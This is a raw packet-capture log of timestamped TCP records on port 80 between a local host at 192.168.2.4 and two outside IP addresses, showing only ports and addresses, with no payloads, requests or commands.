Apr 27, 2024 01:31:19.611006021 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.611042976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.611295938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.611335039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.611349106 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.611371040 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.611375093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.611413956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.611453056 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.611490011 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.611506939 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.611529112 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.611531973 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.611567020 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.611605883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.611643076 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.611646891 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.611681938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.611685991 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.611721039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.611758947 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.611795902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.611810923 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.611834049 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.611835957 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.651087999 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.652695894 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.662719965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.662883043 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.662920952 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.662935019 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.706094027 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.774616003 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.774676085 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.774744987 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.775176048 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.775214911 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.775237083 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.775262117 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.775376081 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.775413036 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.775460005 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.775460005 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.775509119 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.775554895 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.775569916 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.775598049 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.775626898 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.775671005 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.775688887 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.775736094 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.775752068 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.775787115 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.775820017 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.775866032 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.775881052 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.775913000 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.775939941 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.775986910 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.776001930 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.776031971 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.776058912 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.776118040 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.776132107 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.776163101 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.776190042 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.776245117 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.799091101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.799122095 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.799143076 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.799160957 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.799179077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.799179077 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.799197912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.799205065 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.799218893 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.799237013 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.799237967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.799257040 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.799273968 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.799280882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.799299002 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.799340963 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.799355030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.799393892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.799401045 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.799432993 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.799470901 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.799510956 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.799510956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.799550056 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.799551010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.799592018 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.799736023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.799738884 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.799774885 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.799813986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.799851894 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.799854994 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.799894094 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.800368071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.800412893 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.800451994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.800504923 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.800606966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.800647020 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.800649881 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.800690889 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.800730944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.800775051 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.800839901 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.800884008 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.801100969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.801139116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.801177025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.801218033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.801219940 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.801260948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.801263094 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.801301003 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.801341057 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.801378965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.801383018 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.801419973 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.801745892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.801786900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.801826954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.801867008 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.802166939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.802206039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.802206993 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.802870989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.802962065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.803004026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.803011894 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.803042889 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.803045988 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.803085089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.803124905 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.803148031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.803164005 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.803167105 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.803184032 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.803186893 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.803206921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.803225994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.803231001 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.803244114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.803262949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.803278923 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.803308964 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.803313971 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.805037022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.805057049 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.805075884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.805099964 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.805111885 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.805284977 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.805356979 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.805376053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.805413961 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.805418015 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.805437088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.805454969 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.805470943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.805557013 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.805574894 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.805593967 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.805594921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.805615902 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.806149006 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.806168079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.806185961 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.806207895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.806210041 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.806224108 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.806266069 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.806301117 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.806349993 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.806370020 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.806387901 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.806406021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.806421995 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.806430101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.806446075 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.806454897 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.806473017 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.806490898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.806507111 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.806508064 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.806529045 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.806531906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.806550980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.806588888 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.848299026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.848335028 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.848421097 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.857702971 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.857744932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.857799053 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.900995970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.901040077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.901123047 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.946691990 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.946733952 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.946826935 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.947153091 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.947191954 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.947213888 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.947249889 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.948066950 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.948121071 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.948139906 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.948177099 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.948201895 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.948235989 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.948256969 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.948286057 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.948314905 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.948360920 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.948376894 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.948416948 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.948451042 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.948498964 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.948513985 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.948543072 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.948570013 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.948618889 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.948635101 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.948662996 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.948708057 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.948744059 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.948781013 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.948806047 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.948829889 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.948859930 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.948916912 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.994415998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.994456053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.994524002 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.994576931 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.994653940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.994692087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.994715929 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.994729042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.994766951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.994805098 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.994808912 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.994843006 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.994843006 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.994904041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.994939089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.994976997 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.994982004 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.995014906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.995018959 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.995055914 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.995095015 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.995136976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.995145082 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.995177031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.995178938 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.995215893 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.995254040 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.995290995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.995295048 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.995327950 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.995328903 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.995367050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.995454073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.995492935 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.995501041 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.995532036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.995538950 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.995570898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.995609999 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.995646954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.995655060 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.995685101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.995686054 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.995851994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.996167898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.996206045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.996215105 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.996247053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.996247053 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.996284962 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.996321917 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.996361017 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.996366024 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.996401072 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.996404886 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.996438980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.996675014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.996714115 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.996720076 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.996757030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.996819973 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.996961117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.997023106 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.998038054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.998078108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.998116970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.998155117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.998161077 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.998193026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.998199940 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.998233080 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.998270988 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.998306990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.998323917 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.998344898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.998349905 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.998383999 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.998420954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.998459101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.998467922 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.998497009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.998500109 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.998536110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.998574972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.998619080 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.999609947 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.999650002 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.999655008 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.999687910 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.999727964 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.999766111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.999771118 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.999804974 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.999805927 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.999842882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.999881029 CEST	80	49734	176.97.76.106	192.168.2.4
